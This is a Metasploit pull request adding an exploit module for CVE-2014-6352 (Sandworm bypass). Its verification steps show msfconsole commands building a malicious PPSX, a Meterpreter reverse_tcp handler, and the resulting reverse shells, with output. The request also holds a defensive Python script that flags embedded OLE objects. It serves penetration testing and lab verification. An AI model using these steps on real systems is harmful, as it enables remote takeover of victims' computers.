
Add module for CVE-2014-6352 (sandworm ms14-060 bypass) (No UAC bypass) #4185

Merged
merged 1 commit into from Nov 12, 2014

jvazquez-r7
Contributor

Since details have been published: http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous, this pull request adds a module with the ms14-060 bypass as exploited in the wild. It means NO UAC bypass. So unless UAC is disabled or the user is an Administrator, the UAC prompt will trigger, as also explained by Haifei Li in the blog post.

Once Haifei Li publishes contents about his complete bypass (including UAC) this module can be updated, or a new one can be added if necessary.

With @wchen-r7 we were discussing the UAC bypass, but we have not been successful (at the moment :P). Since the details are public, and this technique has been used in the wild, maybe this is useful for someone even without the UAC bypass.

If it's not good enough because it doesn't bypass UAC, I won't be hurt if it's discarded at this moment. Or it can remain open in case there are more details in the near future.

Just doing the Pull Request because I figured it might be useful for someone.

Verification

  • Install Windows 7 SP1 (32 bits)
  • Install Office 2010 SP2 (SP2 is important :) same story as with ms14_060_sandworm).
  • Optional: Apply MS14_060
  • Generate the ppsx with the fileformat exploit:
msf > use exploit/windows/fileformat/ms14_064_packager_run_as_admin
msf exploit(ms14_064_packager_run_as_admin) > show options

Module options (exploit/windows/fileformat/ms14_064_packager_run_as_admin):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.ppsx         yes       The PPSX file


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1 / Office 2010 SP2 / Office 2013


msf exploit(ms14_064_packager_run_as_admin) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_064_packager_run_as_admin) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(ms14_064_packager_run_as_admin) > set LPORT 4444
LPORT => 4444
msf exploit(ms14_064_packager_run_as_admin) > exploit

[*] Creating 'msf.ppsx' file ...
[+] msf.ppsx stored at /Users/jvazquez/.msf4/local/msf.ppsx

  • Setup the payload handler:
msf exploit(ms14_064_packager_run_as_admin) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit


  • Open the ppsx on the target (No external samba resource is needed in this case).
  • A UAC prompt should trigger, allow it
  • Verify you get a session in the handler
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 172.16.158.132

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
msf exploit(handler) >
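For the defender side of the verification steps above, here is an added triage script (not part of this pull request or of the module) that inspects a PowerPoint OOXML file for embedded OLE objects, the artifact an incident responder would look for when a .ppsx triggered a UAC prompt. It assumes, based only on the module name, that the generated document carries its payload as an embedded (Packager) OLE object stored under ppt/embeddings/ and referenced from a slide's .rels file; the sample document is constructed inline.

```python
"""Triage a .ppsx/.pptx for embedded OLE objects (added example, not the PR's code)."""
import io
import posixpath
import re
import zipfile

# OLE compound-file (CFB) header that real embedded objects start with.
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Relationship type OOXML uses to link a slide to an embedded OLE object.
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def find_embedded_ole(data: bytes) -> list:
    """Return [(rels_part, object_part, starts_with_cfb_magic)] for each OLE relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        for rels in sorted(n for n in names if n.startswith("ppt/slides/_rels/")):
            xml = z.read(rels).decode("utf-8", "replace")
            for m in re.finditer(r"<Relationship\b[^>]*>", xml):
                tag = m.group(0)
                if OLE_REL not in tag:
                    continue
                t = re.search(r'Target="([^"]+)"', tag)
                target = t.group(1) if t else ""
                # Targets are relative to ppt/slides/, e.g. ../embeddings/oleObject1.bin
                part = posixpath.normpath(posixpath.join("ppt/slides", target))
                is_cfb = part in names and z.read(part)[:8] == CFB_MAGIC
                hits.append((rels, part, is_cfb))
    return hits


def build_sample() -> bytes:
    """Constructed sample: minimal PPSX-shaped zip with one CFB-headed embedded object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels",
                   '<Relationships><Relationship Id="rId2" Type="%s" '
                   'Target="../embeddings/oleObject1.bin"/></Relationships>' % OLE_REL)
        z.writestr("ppt/embeddings/oleObject1.bin", CFB_MAGIC + b"\x00" * 504)
    return buf.getvalue()


if __name__ == "__main__":
    for rels, part, is_cfb in find_embedded_ole(build_sample()):
        print("%s -> %s (CFB header: %s)" % (rels, part, is_cfb))
```

Any hit is worth a closer look with an OLE parser; a document that needs no network share and still asks for elevation is exactly the no-UAC-bypass case this pull request describes.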

@jvazquez-r7 jvazquez-r7 changed the title Add module for CVE-2014-6352 (No UAC bypass) Add module for CVE-2014-6352 (sandworm ms14-060 bypass) (No UAC bypass) Nov 12, 2014
@wchen-r7 wchen-r7 self-assigned this Nov 12, 2014
@wchen-r7
Contributor

I used Office 2013 instead.

msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.122

meterpreter >

@wchen-r7 wchen-r7 merged commit c35dc2e into rapid7:master Nov 12, 2014
wchen-r7 added a commit that referenced this pull request Nov 12, 2014
@jvazquez-r7 jvazquez-r7 deleted the sandworm_bypass_no_uac branch November 18, 2014 15:56